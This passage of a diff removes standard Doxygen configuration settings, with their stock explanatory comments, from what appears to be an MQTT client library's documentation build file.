-# sources. Doxygen will then generate output that is tailored for
-# VHDL.
-
-OPTIMIZE_OUTPUT_VHDL   = NO
-
-# Doxygen selects the parser to use depending on the extension of the files it
-# parses. With this tag you can assign which parser to use for a given extension.
-# Doxygen has a built-in mapping, but you can override or extend it using this
-# tag. The format is ext=language, where ext is a file extension, and language
-# is one of the parsers supported by doxygen: IDL, Java, Javascript, CSharp, C,
-# C++, D, PHP, Objective-C, Python, Fortran, VHDL, C, C++. For instance to make
-# doxygen treat .inc files as Fortran files (default is PHP), and .f files as C
-# (default is Fortran), use: inc=Fortran f=C. Note that for custom extensions
-# you also need to set FILE_PATTERNS otherwise the files are not read by doxygen.
-
-EXTENSION_MAPPING      =
-
-# If MARKDOWN_SUPPORT is enabled (the default) then doxygen pre-processes all
-# comments according to the Markdown format, which allows for more readable
-# documentation. See http://daringfireball.net/projects/markdown/ for details.
-# The output of markdown processing is further processed by doxygen, so you
-# can mix doxygen, HTML, and XML commands with Markdown formatting.
-# Disable only in case of backward compatibilities issues.
-
-MARKDOWN_SUPPORT       = YES
-
-# If you use STL classes (i.e. std::string, std::vector, etc.) but do not want
-# to include (a tag file for) the STL sources as input, then you should
-# set this tag to YES in order to let doxygen match functions declarations and
-# definitions whose arguments contain STL classes (e.g. func(std::string); v.s.
-# func(std::string) {}). This also makes the inheritance and collaboration
-# diagrams that involve STL classes more complete and accurate.
-
-BUILTIN_STL_SUPPORT    = NO
-
-# If you use Microsoft's C++/CLI language, you should set this option to YES to
-# enable parsing support.
-
-CPP_CLI_SUPPORT        = NO
-
-# Set the SIP_SUPPORT tag to YES if your project consists of sip sources only.
-# Doxygen will parse them like normal C++ but will assume all classes use public
-# instead of private inheritance when no explicit protection keyword is present.
-
-SIP_SUPPORT            = NO
-
-# For Microsoft's IDL there are propget and propput attributes to indicate getter
-# and setter methods for a property. Setting this option to YES (the default)
-# will make doxygen replace the get and set methods by a property in the
-# documentation. This will only work if the methods are indeed getting or
-# setting a simple type. If this is not the case, or you want to show the
-# methods anyway, you should set this option to NO.
-
-IDL_PROPERTY_SUPPORT   = YES
-
-# If member grouping is used in the documentation and the DISTRIBUTE_GROUP_DOC
-# tag is set to YES, then doxygen will reuse the documentation of the first
-# member in the group (if any) for the other members of the group. By default
-# all members of a group must be documented explicitly.
-
-DISTRIBUTE_GROUP_DOC   = NO
-
-# Set the SUBGROUPING tag to YES (the default) to allow class member groups of
-# the same type (for instance a group of public functions) to be put as a
-# subgroup of that type (e.g. under the Public Functions section). Set it to
-# NO to prevent subgrouping. Alternatively, this can be done per class using
-# the \nosubgrouping command.
-
-SUBGROUPING            = YES
-
-# When the INLINE_GROUPED_CLASSES tag is set to YES, classes, structs and
-# unions are shown inside the group in which they are included (e.g. using
-# @ingroup) instead of on a separate page (for HTML and Man pages) or
-# section (for LaTeX and RTF).
-
-INLINE_GROUPED_CLASSES = NO
-
-# When the INLINE_SIMPLE_STRUCTS tag is set to YES, structs, classes, and
-# unions with only public data fields will be shown inline in the documentation
-# of the scope in which they are defined (i.e. file, namespace, or group
-# documentation), provided this scope is documented. If set to NO (the default),
-# structs, classes, and unions are shown on a separate page (for HTML and Man
-# pages) or section (for LaTeX and RTF).
-
-INLINE_SIMPLE_STRUCTS  = NO
-
-# When TYPEDEF_HIDES_STRUCT is enabled, a typedef of a struct, union, or enum
-# is documented as struct, union, or enum with the name of the typedef. So
-# typedef struct TypeS {} TypeT, will appear in the documentation as a struct
-# with name TypeT. When disabled the typedef will appear as a member of a file,
-# namespace, or class. And the struct will be named TypeS. This can typically
-# be useful for C code in case the coding convention dictates that all compound
-# types are typedef'ed and only the typedef is referenced, never the tag name.
-
-TYPEDEF_HIDES_STRUCT   = NO
-
-# The SYMBOL_CACHE_SIZE determines the size of the internal cache use to
-# determine which symbols to keep in memory and which to flush to disk.
-# When the cache is full, less often used symbols will be written to disk.
-# For small to medium size projects (<1000 input files) the default value is
-# probably good enough. For larger projects a too small cache size can cause
-# doxygen to be busy swapping symbols to and from disk most of the time
-# causing a significant performance penalty.
-# If the system has enough physical memory increasing the cache will improve the
-# performance by keeping more symbols in memory. Note that the value works on
-# a logarithmic scale so increasing the size by one will roughly double the
-# memory usage. The cache size is given by this formula:
-# 2^(16+SYMBOL_CACHE_SIZE). The valid range is 0..9, the default is 0,
-# corresponding to a cache size of 2^16 = 65536 symbols.
-
-SYMBOL_CACHE_SIZE      = 0
-
-# Similar to the SYMBOL_CACHE_SIZE the size of the symbol lookup cache can be
-# set using LOOKUP_CACHE_SIZE. This cache is used to resolve symbols given
-# their name and scope. Since this can be an expensive process and often the
-# same symbol appear multiple times in the code, doxygen keeps a cache of
-# pre-resolved symbols. If the cache is too small doxygen will become slower.
-# If the cache is too large, memory is wasted. The cache size is given by this
-# formula: 2^(16+LOOKUP_CACHE_SIZE). The valid range is 0..9, the default is 0,
-# corresponding to a cache size of 2^16 = 65536 symbols.
-
-LOOKUP_CACHE_SIZE      = 0
-
-#---------------------------------------------------------------------------
-# Build related configuration options
-#---------------------------------------------------------------------------
-
-# If the EXTRACT_ALL tag is set to YES doxygen will assume all entities in
-# documentation are documented, even if no documentation was available.
-# Private class members and static file members will be hidden unless
-# the EXTRACT_PRIVATE and EXTRACT_STATIC tags are set to YES
-
-EXTRACT_ALL            = NO
-
-# If the EXTRACT_PRIVATE tag is set to YES all private members of a class
-# will be included in the documentation.
-
-EXTRACT_PRIVATE        = YES
-
-# If the EXTRACT_PACKAGE tag is set to YES all members with package or internal scope will be included in the documentation.
-
-EXTRACT_PACKAGE        = NO
-
-# If the EXTRACT_STATIC tag is set to YES all static members of a file
-# will be included in the documentation.
-
-EXTRACT_STATIC         = YES
-
-# If the EXTRACT_LOCAL_CLASSES tag is set to YES classes (and structs)
-# defined locally in source files will be included in the documentation.
-# If set to NO only classes defined in header files are included.
-
-EXTRACT_LOCAL_CLASSES  = YES
-
-# This flag is only useful for Objective-C code. When set to YES local
-# methods, which are defined in the implementation section but not in
-# the interface are included in the documentation.
-# If set to NO (the default) only methods in the interface are included.
-
-EXTRACT_LOCAL_METHODS  = NO
-
-# If this flag is set to YES, the members of anonymous namespaces will be
-# extracted and appear in the documentation as a namespace called
-# 'anonymous_namespace{file}', where file will be replaced with the base
-# name of the file that contains the anonymous namespace. By default
-# anonymous namespaces are hidden.
-
-EXTRACT_ANON_NSPACES   = NO
-
-# If the HIDE_UNDOC_MEMBERS tag is set to YES, Doxygen will hide all
-# undocumented members of documented classes, files or namespaces.
-# If set to NO (the default) these members will be included in the
-# various overviews, but no documentation section is generated.
-# This option has no effect if EXTRACT_ALL is enabled.
-
-HIDE_UNDOC_MEMBERS     = NO
-
-# If the HIDE_UNDOC_CLASSES tag is set to YES, Doxygen will hide all
-# undocumented classes that are normally visible in the class hierarchy.
-# If set to NO (the default) these classes will be included in the various
-# overviews. This option has no effect if EXTRACT_ALL is enabled.
-
-HIDE_UNDOC_CLASSES     = NO
-
-# If the HIDE_FRIEND_COMPOUNDS tag is set to YES, Doxygen will hide all
-# friend (class|struct|union) declarations.
-# If set to NO (the default) these declarations will be included in the
-# documentation.
-
-HIDE_FRIEND_COMPOUNDS  = NO
-
-# If the HIDE_IN_BODY_DOCS tag is set to YES, Doxygen will hide any
-# documentation blocks found inside the body of a function.
-# If set to NO (the default) these blocks will be appended to the
-# function's detailed documentation block.
-
-HIDE_IN_BODY_DOCS      = NO
-
-# The INTERNAL_DOCS tag determines if documentation
-# that is typed after a \internal command is included. If the tag is set
-# to NO (the default) then the documentation will be excluded.
-# Set it to YES to include the internal documentation.
-
-INTERNAL_DOCS          = NO
-
-# If the CASE_SENSE_NAMES tag is set to NO then Doxygen will only generate
-# file names in lower-case letters. If set to YES upper-case letters are also
-# allowed. This is useful if you have classes or files whose names only differ
-# in case and if your file system supports case sensitive file names. Windows
-# and Mac users are advised to set this option to NO.
-
-CASE_SENSE_NAMES       = YES
-
-# If the HIDE_SCOPE_NAMES tag is set to NO (the default) then Doxygen
-# will show members with their full class and namespace scopes in the
-# documentation. If set to YES the scope will be hidden.
-
-HIDE_SCOPE_NAMES       = NO
-
-# If the SHOW_INCLUDE_FILES tag is set to YES (the default) then Doxygen
-# will put a list of the files that are included by a file in the documentation
-# of that file.
-
-SHOW_INCLUDE_FILES     = YES
-
-# If the FORCE_LOCAL_INCLUDES tag is set to YES then Doxygen
-# will list include files with double quotes in the documentation
-# rather than with sharp brackets.
-
-FORCE_LOCAL_INCLUDES   = NO
-
-# If the INLINE_INFO tag is set to YES (the default) then a tag [inline]
-# is inserted in the documentation for inline members.
-
-INLINE_INFO            = YES
-
-# If the SORT_MEMBER_DOCS tag is set to YES (the default) then doxygen
-# will sort the (detailed) documentation of file and class members
-# alphabetically by member name. If set to NO the members will appear in
-# declaration order.
-
-SORT_MEMBER_DOCS       = YES
-
-# If the SORT_BRIEF_DOCS tag is set to YES then doxygen will sort the
-# brief documentation of file, namespace and class members alphabetically
-# by member name. If set to NO (the default) the members will appear in
-# declaration order.
-
-SORT_BRIEF_DOCS        = NO
-
-# If the SORT_MEMBERS_CTORS_1ST tag is set to YES then doxygen
-# will sort the (brief and detailed) documentation of class members so that
-# constructors and destructors are listed first. If set to NO (the default)
-# the constructors will appear in the respective orders defined by
-# SORT_MEMBER_DOCS and SORT_BRIEF_DOCS.
-# This tag will be ignored for brief docs if SORT_BRIEF_DOCS is set to NO
-# and ignored for detailed docs if SORT_MEMBER_DOCS is set to NO.
-
-SORT_MEMBERS_CTORS_1ST = NO
-
-# If the SORT_GROUP_NAMES tag is set to YES then doxygen will sort the
-# hierarchy of group names into alphabetical order. If set to NO (the default)
-# the group names will appear in their defined order.
-
-SORT_GROUP_NAMES       = NO
-
-# If the SORT_BY_SCOPE_NAME tag is set to YES, the class list will be
-# sorted by fully-qualified names, including namespaces. If set to
-# NO (the default), the class list will be sorted only by class name,
-# not including the namespace part.
-# Note: This option is not very useful if HIDE_SCOPE_NAMES is set to YES.
-# Note: This option applies only to the class list, not to the
-# alphabetical list.
-
-SORT_BY_SCOPE_NAME     = NO
-
-# If the STRICT_PROTO_MATCHING option is enabled and doxygen fails to
-# do proper type resolution of all parameters of a function it will reject a
-# match between the prototype and the implementation of a member function even
-# if there is only one candidate or it is obvious which candidate to choose
-# by doing a simple string match. By disabling STRICT_PROTO_MATCHING doxygen
-# will still accept a match between prototype and implementation in such cases.
-
-STRICT_PROTO_MATCHING  = NO
-
-# The GENERATE_TODOLIST tag can be used to enable (YES) or
-# disable (NO) the todo list. This list is created by putting \todo
-# commands in the documentation.
-
-GENERATE_TODOLIST      = YES
-
-# The GENERATE_TESTLIST tag can be used to enable (YES) or
-# disable (NO) the test list. This list is created by putting \test
-# commands in the documentation.
-
-GENERATE_TESTLIST      = YES
-
-# The GENERATE_BUGLIST tag can be used to enable (YES) or
-# disable (NO) the bug list. This list is created by putting \bug
-# commands in the documentation.
-
-GENERATE_BUGLIST       = YES
-
-# The GENERATE_DEPRECATEDLIST tag can be used to enable (YES) or
-# disable (NO) the deprecated list. This list is created by putting
-# \deprecated commands in the documentation.
-
-GENERATE_DEPRECATEDLIST= YES
-
-# The ENABLED_SECTIONS tag can be used to enable conditional
-# documentation sections, marked by \if sectionname ... \endif.
-
-ENABLED_SECTIONS       = MQTTClient_internal
-
-# The MAX_INITIALIZER_LINES tag determines the maximum number of lines
-# the initial value of a variable or macro consists of for it to appear in
-# the documentation. If the initializer consists of more lines than specified
-# here it will be hidden. Use a value of 0 to hide initializers completely.
-# The appearance of the initializer of individual variables and macros in the
-# documentation can be controlled using \showinitializer or \hideinitializer
-# command in the documentation regardless of this setting.
-
-MAX_INITIALIZER_LINES  = 30
-
-# Set the SHOW_USED_FILES tag to NO to disable the list of files generated
-# at the bottom of the documentation of classes and structs. If set to YES the
-# list will mention the files that were used to generate the documentation.
-
-SHOW_USED_FILES        = YES
-
-# Set the SHOW_FILES tag to NO to disable the generation of the Files page.
-# This will remove the Files entry from the Quick Index and from the
-# Folder Tree View (if specified). The default is YES.
-
-SHOW_FILES             = YES
-
-# Set the SHOW_NAMESPACES tag to NO to disable the generation of the
-# Namespaces page.
-# This will remove the Namespaces entry from the Quick Index
-# and from the Folder Tree View (if specified). The default is YES.
-
-SHOW_NAMESPACES        = YES
-
-# The FILE_VERSION_FILTER tag can be used to specify a program or script that
-# doxygen should invoke to get the current version for each file (typically from
-# the version control system). Doxygen will invoke the program by executing (via
-# popen()) the command <command> <input-file>, where <command> is the value of
-# the FILE_VERSION_FILTER tag, and <input-file> is the name of an input file
-# provided by doxygen. Whatever the program writes to standard output
-# is used as the file version. See the manual for examples.
-
-FILE_VERSION_FILTER    =
-
-# The LAYOUT_FILE tag can be used to specify a layout file which will be parsed
-# by doxygen. The layout file controls the global structure of the generated
-# output files in an output format independent way. To create the layout file
-# that represents doxygen's defaults, run doxygen with the -l option.
-# You can optionally specify a file name after the option, if omitted
-# DoxygenLayout.xml will be used as the name of the layout file.
-
-LAYOUT_FILE            =
-
-# The CITE_BIB_FILES tag can be used to specify one or more bib files
-# containing the references data. This must be a list of .bib files. The
-# .bib extension is automatically appended if omitted. Using this command
-# requires the bibtex tool to be installed. See also
-# http://en.wikipedia.org/wiki/BibTeX for more info. For LaTeX the style
-# of the bibliography can be controlled using LATEX_BIB_STYLE. To use this
-# feature you need bibtex and perl available in the search path.
-
-CITE_BIB_FILES         =
-
-#---------------------------------------------------------------------------
-# configuration options related to warning and progress messages
-#---------------------------------------------------------------------------
-
-# The QUIET tag can be used to turn on/off the messages that are generated
-# by doxygen. Possible values are YES and NO. If left blank NO is used.
-
-QUIET                  = NO
-
-# The WARNINGS tag can be used to turn on/off the warning messages that are
-# generated by doxygen. Possible values are YES and NO. If left blank
-# NO is used.
-
-WARNINGS               = YES
-
-# If WARN_IF_UNDOCUMENTED is set to YES, then doxygen will generate warnings
-# for undocumented members. If EXTRACT_ALL is set to YES then this flag will
-# automatically be disabled.
-
-WARN_IF_UNDOCUMENTED   = YES
-
-# If WARN_IF_DOC_ERROR is set to YES, doxygen will generate warnings for
-# potential errors in the documentation, such as not documenting some
-# parameters in a documented function, or documenting parameters that
-# don't exist or using markup commands wrongly.
-
-WARN_IF_DOC_ERROR      = YES
-
-# The WARN_NO_PARAMDOC option can be enabled to get warnings for
-# functions that are documented, but have no documentation for their parameters
-# or return value. If set to NO (the default) doxygen will only warn about
-# wrong or incomplete parameter documentation, but not about the absence of
-# documentation.
-
-WARN_NO_PARAMDOC       = NO
-
-# The WARN_FORMAT tag determines the format of the warning messages that
-# doxygen can produce. The string should contain the $file, $line, and $text
-# tags, which will be replaced by the file and line number from which the
-# warning originated and the warning text. Optionally the format may contain
-# $version, which will be replaced by the version of the file (if it could
-# be obtained via FILE_VERSION_FILTER)
-
-WARN_FORMAT            = "$file:$line: $text"
-
-# The WARN_LOGFILE tag can be used to specify a file to which warning
-# and error messages should be written. If left blank the output is written
-# to stderr.
-
-WARN_LOGFILE           =
-
-#---------------------------------------------------------------------------
-# configuration options related to the input files
-#---------------------------------------------------------------------------
-
-# The INPUT tag can be used to specify the files and/or directories that contain
-# documented source files. You may enter file names like "myfile.cpp" or
-# directories like "/usr/src/myproject". Separate the files or directories
-# with spaces.
-
-INPUT                  = "."
-
-
-# This tag can be used to specify the character encoding of the source files
-# that doxygen parses. Internally doxygen uses the UTF-8 encoding, which is
-# also the default input encoding. Doxygen uses libiconv (or the iconv built
-# into libc) for the transcoding. See http://www.gnu.org/software/libiconv for
-# the list of possible encodings.
-
-INPUT_ENCODING         = UTF-8
-
-# If the value of the INPUT tag contains directories, you can use the
-# FILE_PATTERNS tag to specify one or more wildcard pattern (like *.cpp
-# and *.h) to filter out the source-files in the directories. If left
-# blank the following patterns are tested:
-# *.c *.cc *.cxx *.cpp *.c++ *.d *.java *.ii *.ixx *.ipp *.i++ *.inl *.h *.hh
-# *.hxx *.hpp *.h++ *.idl *.odl *.cs *.php *.php3 *.inc *.m *.mm *.dox *.py
-# *.f90 *.f *.for *.vhd *.vhdl
-
-FILE_PATTERNS          = *.cc \
-                         *.cxx \
-                         *.cpp \
-                         *.c++ \
-                         *.d \
-                         *.java \
-                         *.ii \
-                         *.ixx \
-                         *.ipp \
-                         *.i++ \
-                         *.inl \
-                         *.h \
-                         *.hh \
-                         *.hxx \
-                         *.hpp \
-                         *.h++ \
-                         *.idl \
-                         *.odl \
-                         *.cs \
-                         *.php \
-                         *.php3 \
-                         *.inc \
-                         *.m \
-                         *.mm \
-                         *.dox \
-                         *.py \
-                         *.f90 \
-                         *.f \
-                         *.vhd \
-                         *.vhdl \
-                         *.C \
-                         *.CC \
-                         *.C++ \
-                         *.II \
-                         *.I++ \
-                         *.H \
-                         *.HH \
-                         *.H++ \
-                         *.CS \
-                         *.PHP \
-                         *.PHP3 \
-                         *.M \
-                         *.MM \
-                         *.PY \
-                         *.F90 \
-                         *.F \
-                         *.VHD \
-                         *.VHDL \
-                         *.c
-
-# The RECURSIVE tag can be used to turn specify whether or not subdirectories
-# should be searched for input files as well. Possible values are YES and NO.
-# If left blank NO is used.
-
-RECURSIVE              = NO
-
-# The EXCLUDE tag can be used to specify files and/or directories that should be
-# excluded from the INPUT source files. This way you can easily exclude a
-# subdirectory from a directory tree whose root is specified with the INPUT tag.
-# Note that relative paths are relative to the directory from which doxygen is
-# run.
-
-EXCLUDE                =
-
-# The EXCLUDE_SYMLINKS tag can be used to select whether or not files or
-# directories that are symbolic links (a Unix file system feature) are excluded
-# from the input.
-
-EXCLUDE_SYMLINKS       = NO
-
-# If the value of the INPUT tag contains directories, you can use the
-# EXCLUDE_PATTERNS tag to specify one or more wildcard patterns to exclude
-# certain files from those directories. Note that the wildcards are matched
-# against the file with absolute path, so to exclude all test directories
-# for example use the pattern */test/*
-
-EXCLUDE_PATTERNS       =
-
-# The EXCLUDE_SYMBOLS tag can be used to specify one or more symbol names
-# (namespaces, classes, functions, etc.) that should be excluded from the
-# output. The symbol name can be a fully qualified name, a word, or if the
-# wildcard * is used, a substring. Examples: ANamespace, AClass,
-# AClass::ANamespace, ANamespace::*Test
-
-EXCLUDE_SYMBOLS        =
-
-# The EXAMPLE_PATH tag can be used to specify one or more files or
-# directories that contain example code fragments that are included (see
-# the \include command).
-
-EXAMPLE_PATH           =
-
-# If the value of the EXAMPLE_PATH tag contains directories, you can use the
-# EXAMPLE_PATTERNS tag to specify one or more wildcard pattern (like *.cpp
-# and *.h) to filter out the source-files in the directories. If left
-# blank all files are included.
-
-EXAMPLE_PATTERNS       = *
-
-# If the EXAMPLE_RECURSIVE tag is set to YES then subdirectories will be
-# searched for input files to be used with the \include or \dontinclude
-# commands irrespective of the value of the RECURSIVE tag.
-# Possible values are YES and NO. If left blank NO is used.
-
-EXAMPLE_RECURSIVE      = NO
-
-# The IMAGE_PATH tag can be used to specify one or more files or
-# directories that contain image that are included in the documentation (see
-# the \image command).
-
-IMAGE_PATH             =
-
-# The INPUT_FILTER tag can be used to specify a program that doxygen should
-# invoke to filter for each input file. Doxygen will invoke the filter program
-# by executing (via popen()) the command <filter> <input-file>, where <filter>
-# is the value of the INPUT_FILTER tag, and <input-file> is the name of an
-# input file. Doxygen will then use the output that the filter program writes
-# to standard output.
-# If FILTER_PATTERNS is specified, this tag will be
-# ignored.
-
-INPUT_FILTER           =
-
-# The FILTER_PATTERNS tag can be used to specify filters on a per file pattern
-# basis.
-# Doxygen will compare the file name with each pattern and apply the
-# filter if there is a match.
-# The filters are a list of the form:
-# pattern=filter (like *.cpp=my_cpp_filter). See INPUT_FILTER for further
-# info on how filters are used. If FILTER_PATTERNS is empty or if
-# non of the patterns match the file name, INPUT_FILTER is applied.
-
-FILTER_PATTERNS        =
-
-# If the FILTER_SOURCE_FILES tag is set to YES, the input filter (if set using
-# INPUT_FILTER) will be used to filter the input files when producing source
-# files to browse (i.e. when SOURCE_BROWSER is set to YES).
-
-FILTER_SOURCE_FILES    = NO
-
-# The FILTER_SOURCE_PATTERNS tag can be used to specify source filters per file
-# pattern. A pattern will override the setting for FILTER_PATTERN (if any)
-# and it is also possible to disable source filtering for a specific pattern
-# using *.ext= (so without naming a filter). This option only has effect when
-# FILTER_SOURCE_FILES is enabled.
-
-FILTER_SOURCE_PATTERNS =
-
-#---------------------------------------------------------------------------
-# configuration options related to source browsing
-#---------------------------------------------------------------------------
-
-# If the SOURCE_BROWSER tag is set to YES then a list of source files will
-# be generated. Documented entities will be cross-referenced with these sources.
-# Note: To get rid of all source code in the generated output, make sure also
-# VERBATIM_HEADERS is set to NO.
-
-SOURCE_BROWSER         = NO
-
-# Setting the INLINE_SOURCES tag to YES will include the body
-# of functions and classes directly in the documentation.
-
-INLINE_SOURCES         = NO
-
-# Setting the STRIP_CODE_COMMENTS tag to YES (the default) will instruct
-# doxygen to hide any special comment blocks from generated source code
-# fragments. Normal C, C++ and Fortran comments will always remain visible.
-
-STRIP_CODE_COMMENTS    = YES
-
-# If the REFERENCED_BY_RELATION tag is set to YES
-# then for each documented function all documented
-# functions referencing it will be listed.
-
-REFERENCED_BY_RELATION = NO
-
-# If the REFERENCES_RELATION tag is set to YES
-# then for each documented function all documented entities
-# called/used by that function will be listed.
-
-REFERENCES_RELATION    = NO
-
-# If the REFERENCES_LINK_SOURCE tag is set to YES (the default)
-# and SOURCE_BROWSER tag is set to YES, then the hyperlinks from
-# functions in REFERENCES_RELATION and REFERENCED_BY_RELATION lists will
-# link to the source code.
-# Otherwise they will link to the documentation.
-
-REFERENCES_LINK_SOURCE = YES
-
-# If the USE_HTAGS tag is set to YES then the references to source code
-# will point to the HTML generated by the htags(1) tool instead of doxygen
-# built-in source browser. The htags tool is part of GNU's global source
-# tagging system (see http://www.gnu.org/software/global/global.html). You
-# will need version 4.8.6 or higher.
-
-USE_HTAGS              = NO
-
-# If the VERBATIM_HEADERS tag is set to YES (the default) then Doxygen
-# will generate a verbatim copy of the header file for each class for
-# which an include is specified. Set to NO to disable this.
-
-VERBATIM_HEADERS       = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the alphabetical class index
-#---------------------------------------------------------------------------
-
-# If the ALPHABETICAL_INDEX tag is set to YES, an alphabetical index
-# of all compounds will be generated. Enable this if the project
-# contains a lot of classes, structs, unions or interfaces.
-
-ALPHABETICAL_INDEX     = NO
-
-# If the alphabetical index is enabled (see ALPHABETICAL_INDEX) then
-# the COLS_IN_ALPHA_INDEX tag can be used to specify the number of columns
-# in which this list will be split (can be a number in the range [1..20])
-
-COLS_IN_ALPHA_INDEX    = 5
-
-# In case all classes in a project start with a common prefix, all
-# classes will be put under the same header in the alphabetical index.
-# The IGNORE_PREFIX tag can be used to specify one or more prefixes that
-# should be ignored while generating the index headers.
-
-IGNORE_PREFIX          =
-
-#---------------------------------------------------------------------------
-# configuration options related to the HTML output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_HTML tag is set to YES (the default) Doxygen will
-# generate HTML output.
-
-GENERATE_HTML          = YES
-
-# The HTML_OUTPUT tag is used to specify where the HTML docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `html' will be used as the default path.
-
-HTML_OUTPUT            = html
-
-# The HTML_FILE_EXTENSION tag can be used to specify the file extension for
-# each generated HTML page (for example: .htm,.php,.asp). If it is left blank
-# doxygen will generate files with .html extension.
-
-HTML_FILE_EXTENSION    = .html
-
-# The HTML_HEADER tag can be used to specify a personal HTML header for
-# each generated HTML page. If it is left blank doxygen will generate a
-# standard header. Note that when using a custom header you are responsible
-#  for the proper inclusion of any scripts and style sheets that doxygen
-# needs, which is dependent on the configuration options used.
-# It is advised to generate a default header using "doxygen -w html
-# header.html footer.html stylesheet.css YourConfigFile" and then modify
-# that header. Note that the header is subject to change so you typically
-# have to redo this when upgrading to a newer version of doxygen or when
-# changing the value of configuration settings such as GENERATE_TREEVIEW!
-
-HTML_HEADER            =
-
-# The HTML_FOOTER tag can be used to specify a personal HTML footer for
-# each generated HTML page. If it is left blank doxygen will generate a
-# standard footer.
-
-HTML_FOOTER            =
-
-# The HTML_STYLESHEET tag can be used to specify a user-defined cascading
-# style sheet that is used by each HTML page. It can be used to
-# fine-tune the look of the HTML output. If the tag is left blank doxygen
-# will generate a default style sheet. Note that doxygen will try to copy
-# the style sheet file to the HTML output directory, so don't put your own
-# style sheet in the HTML output directory as well, or it will be erased!
-
-HTML_STYLESHEET        =
-
-# The HTML_EXTRA_FILES tag can be used to specify one or more extra images or
-# other source files which should be copied to the HTML output directory. Note
-# that these files will be copied to the base HTML output directory. Use the
-# $relpath$ marker in the HTML_HEADER and/or HTML_FOOTER files to load these
-# files. In the HTML_STYLESHEET file, use the file name only. Also note that
-# the files will be copied as-is; there are no commands or markers available.
-
-HTML_EXTRA_FILES       =
-
-# The HTML_COLORSTYLE_HUE tag controls the color of the HTML output.
-# Doxygen will adjust the colors in the style sheet and background images
-# according to this color. Hue is specified as an angle on a colorwheel,
-# see http://en.wikipedia.org/wiki/Hue for more information.
-# For instance the value 0 represents red, 60 is yellow, 120 is green,
-# 180 is cyan, 240 is blue, 300 purple, and 360 is red again.
-# The allowed range is 0 to 359.
-
-HTML_COLORSTYLE_HUE    = 220
-
-# The HTML_COLORSTYLE_SAT tag controls the purity (or saturation) of
-# the colors in the HTML output. For a value of 0 the output will use
-# grayscales only. A value of 255 will produce the most vivid colors.
-
-HTML_COLORSTYLE_SAT    = 100
-
-# The HTML_COLORSTYLE_GAMMA tag controls the gamma correction applied to
-# the luminance component of the colors in the HTML output. Values below
-# 100 gradually make the output lighter, whereas values above 100 make
-# the output darker. The value divided by 100 is the actual gamma applied,
-# so 80 represents a gamma of 0.8, The value 220 represents a gamma of 2.2,
-# and 100 does not change the gamma.
-
-HTML_COLORSTYLE_GAMMA  = 80
-
-# If the HTML_TIMESTAMP tag is set to YES then the footer of each generated HTML
-# page will contain the date and time when the page was generated. Setting
-# this to NO can help when comparing the output of multiple runs.
-
-HTML_TIMESTAMP         = YES
-
-# If the HTML_DYNAMIC_SECTIONS tag is set to YES then the generated HTML
-# documentation will contain sections that can be hidden and shown after the
-# page has loaded.
-
-HTML_DYNAMIC_SECTIONS  = NO
-
-# With HTML_INDEX_NUM_ENTRIES one can control the preferred number of
-# entries shown in the various tree structured indices initially; the user
-# can expand and collapse entries dynamically later on. Doxygen will expand
-# the tree to such a level that at most the specified number of entries are
-# visible (unless a fully collapsed tree already exceeds this amount).
-# So setting the number of entries 1 will produce a full collapsed tree by
-# default. 0 is a special value representing an infinite number of entries
-# and will result in a full expanded tree by default.
-
-HTML_INDEX_NUM_ENTRIES = 100
-
-# If the GENERATE_DOCSET tag is set to YES, additional index files
-# will be generated that can be used as input for Apple's Xcode 3
-# integrated development environment, introduced with OSX 10.5 (Leopard).
-# To create a documentation set, doxygen will generate a Makefile in the
-# HTML output directory. Running make will produce the docset in that
-# directory and running "make install" will install the docset in
-# ~/Library/Developer/Shared/Documentation/DocSets so that Xcode will find
-# it at startup.
-# See http://developer.apple.com/tools/creatingdocsetswithdoxygen.html
-# for more information.
-
-GENERATE_DOCSET        = NO
-
-# When GENERATE_DOCSET tag is set to YES, this tag determines the name of the
-# feed. A documentation feed provides an umbrella under which multiple
-# documentation sets from a single provider (such as a company or product suite)
-# can be grouped.
-
-DOCSET_FEEDNAME        = "Doxygen generated docs"
-
-# When GENERATE_DOCSET tag is set to YES, this tag specifies a string that
-# should uniquely identify the documentation set bundle. This should be a
-# reverse domain-name style string, e.g. com.mycompany.MyDocSet. Doxygen
-# will append .docset to the name.
-
-DOCSET_BUNDLE_ID       = org.doxygen.Project
-
-# When GENERATE_PUBLISHER_ID tag specifies a string that should uniquely identify
-# the documentation publisher. This should be a reverse domain-name style
-# string, e.g. com.mycompany.MyDocSet.documentation.
-
-DOCSET_PUBLISHER_ID    = org.doxygen.Publisher
-
-# The GENERATE_PUBLISHER_NAME tag identifies the documentation publisher.
-
-DOCSET_PUBLISHER_NAME  = Publisher
-
-# If the GENERATE_HTMLHELP tag is set to YES, additional index files
-# will be generated that can be used as input for tools like the
-# Microsoft HTML help workshop to generate a compiled HTML help file (.chm)
-# of the generated HTML documentation.
-
-GENERATE_HTMLHELP      = NO
-
-# If the GENERATE_HTMLHELP tag is set to YES, the CHM_FILE tag can
-# be used to specify the file name of the resulting .chm file. You
-# can add a path in front of the file if the result should not be
-# written to the html output directory.
-
-CHM_FILE               =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the HHC_LOCATION tag can
-# be used to specify the location (absolute path including file name) of
-# the HTML help compiler (hhc.exe). If non-empty doxygen will try to run
-# the HTML help compiler on the generated index.hhp.
-
-HHC_LOCATION           =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the GENERATE_CHI flag
-# controls if a separate .chi index file is generated (YES) or that
-# it should be included in the master .chm file (NO).
-
-GENERATE_CHI           = NO
-
-# If the GENERATE_HTMLHELP tag is set to YES, the CHM_INDEX_ENCODING
-# is used to encode HtmlHelp index (hhk), content (hhc) and project file
-# content.
-
-CHM_INDEX_ENCODING     =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the BINARY_TOC flag
-# controls whether a binary table of contents is generated (YES) or a
-# normal table of contents (NO) in the .chm file.
-
-BINARY_TOC             = NO
-
-# The TOC_EXPAND flag can be set to YES to add extra items for group members
-# to the contents of the HTML help documentation and to the tree view.
-
-TOC_EXPAND             = NO
-
-# If the GENERATE_QHP tag is set to YES and both QHP_NAMESPACE and
-# QHP_VIRTUAL_FOLDER are set, an additional index file will be generated
-# that can be used as input for Qt's qhelpgenerator to generate a
-# Qt Compressed Help (.qch) of the generated HTML documentation.
-
-GENERATE_QHP           = NO
-
-# If the QHG_LOCATION tag is specified, the QCH_FILE tag can
-# be used to specify the file name of the resulting .qch file.
